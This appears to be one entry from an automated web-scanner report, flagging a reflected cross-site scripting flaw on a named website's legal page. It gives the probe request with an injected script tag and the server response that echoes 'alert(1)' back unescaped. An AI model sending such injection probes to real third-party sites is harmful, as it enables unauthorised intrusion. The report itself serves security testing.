1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.worldsite.ws |
Path: | /legal/index.dhtml |
GET /legalf7d39%253cscript Host: www.worldsite.ws Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Fri, 12 Nov 2010 00:39:00 GMT Content-Type: text/html Connection: close Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Content-Length: 4574 <html><head><title>The Internet Land Rush is On! | GDI, Inc.</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body bgcolor="#ffffff" leftmargin="0" topmarg ...[SNIP]... <td width="413" height="117" bgcolor="#f5f5f5" style="padding: 10px; font-family: tahoma; font-size: 13px; text-align: justify;" valign="top"> ERROR: Invalid Sponsor Username (legalf7d39<script>alert(1)< ...[SNIP]... |